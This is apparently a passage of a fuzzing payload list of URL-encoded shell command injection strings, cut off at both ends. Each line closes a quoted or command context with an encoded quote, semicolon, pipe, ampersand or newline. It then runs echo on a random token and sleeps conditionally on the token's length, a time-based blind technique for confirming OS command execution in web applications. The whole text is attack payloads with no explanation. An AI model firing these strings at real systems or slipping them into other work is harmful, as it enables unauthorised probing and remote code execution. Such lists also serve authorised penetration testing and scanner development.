252F%252F\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RYBKIP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RYBKIP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20RYBKIP%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%252F%252F\n%2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2522%0A%20str%3D%24%28echo%20VOOIFO%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%252F%252F\n%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2522%3B%20str%3D%24%28echo%20GJYXKU%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%2526\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20GZCIAW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20GZCIAW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20GZCIAW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20GZCIAW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20GZCIAW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20GZCIAW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20GZCIAW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20GZCIAW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20GZCIAW%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%2526\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20HSDBTA%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%2526\n%2522%0A%20str%3D%24%28echo%20SFURKW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2522%0A%20str%3D%24%28echo%20SFURKW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2522%0A%20str%3D%24%28echo%20SFURKW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2522%0A%20str%3D%24%28echo%20SFURKW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2522%0A%20str%3D%24%28echo%20SFURKW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2522%0A%20str%3D%24%28echo%20SFURKW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2522%0A%20str%3D%24%28echo%20SFURKW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2522%0A%20str%3D%24%28echo%20SFURKW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2522%0A%20str%3D%24%28echo%20SFURKW%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%2526\n%2522%3B%20str%3D%24%28echo%20ZWBBRM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2522%3B%20str%3D%24%28echo%20ZWBBRM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2522%3B%20str%3D%24%28echo%20ZWBBRM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2522%3B%20str%3D%24%28echo%20ZWBBRM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2522%3B%20str%3D%24%28echo%20ZWBBRM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2522%3B%20str%3D%24%28echo%20ZWBBRM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2522%3B%20str%3D%24%28echo%20ZWBBRM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2522%3B%20str%3D%24%28echo%20ZWBBRM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2522%3B%20str%3D%24%28echo%20ZWBBRM%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%257C\n%2522%7C%20%5B%201%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2522%7C%20%5B%202%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2522%7C%20%5B%203%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2522%7C%20%5B%204%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2522%7C%20%5B%205%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2522%7C%20%5B%206%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2522%7C%20%5B%207%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2522%7C%20%5B%208%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2522%7C%20%5B%209%20-ne%20%24%28echo%20DAZTLG%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%257C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2522%26%20sleep%200%20%26%26%20str%3D%24%28echo%20VAVICY%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20%257C\n%2522%0A%20str%3D%24%28echo%20ZLOWUA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2522%0A%20str%3D%24%28echo%20ZLOWUA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2522%0A%20str%3D%24%28echo%20ZLOWUA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2522%0A%20str%3D%24%28echo%20ZLOWUA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2522%0A%20str%3D%24%28echo%20ZLOWUA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2522%0A%20str%3D%24%28echo%20ZLOWUA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2522%0A%20str%3D%24%28echo%20ZLOWUA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2522%0A%20str%3D%24%28echo%20ZLOWUA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%2522%0A%20str%3D%24%28echo%20ZLOWUA%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20%257C\n%3B%20str%3D%24%28echo%20MSPTMX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20MSPTMX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20MSPTMX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20MSPTMX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20MSPTMX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20MSPTMX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20MSPTMX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20MSPTMX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%3B%20str%3D%24%28echo%20MSPTMX%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20\n%7C%20%5B%201%20-ne%20%24%28echo%20ANNQCK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%202%20-ne%20%24%28echo%20ANNQCK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%203%20-ne%20%24%28echo%20ANNQCK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%204%20-ne%20%24%28echo%20ANNQCK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%205%20-ne%20%24%28echo%20ANNQCK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%206%20-ne%20%24%28echo%20ANNQCK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%207%20-ne%20%24%28echo%20ANNQCK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%208%20-ne%20%24%28echo%20ANNQCK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%7C%20%5B%209%20-ne%20%24%28echo%20ANNQCK%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%201%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%202%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%203%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%204%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%205%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%206%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%207%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%208%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%26%20sleep%200%20%26%26%20str%3D%24%28echo%20TABXYH%29%20%26%26%20str1%3D%24%7B%23str%7D%20%26%26%20%5B%209%20-eq%20%24%7Bstr1%7D%20%5D%20%26%26%20sleep%201%20\n%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%0A%20str%3D%24%28echo%20NWELWC%29%0A%20str1%3D%24%7B%23str%7D%0A%20if%20%5B%209%20-ne%20%24%7Bstr1%7D%20%5D%0A%20then%20sleep%200%0A%20else%20sleep%201%0A%20fi%20\n%3B%20str%3D%24%28echo%20YSDKBB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%201%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YSDKBB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%202%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YSDKBB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%203%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YSDKBB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YSDKBB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%205%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YSDKBB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YSDKBB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%207%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%27\n%3B%20str%3D%24%28echo%20YSDKBB%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%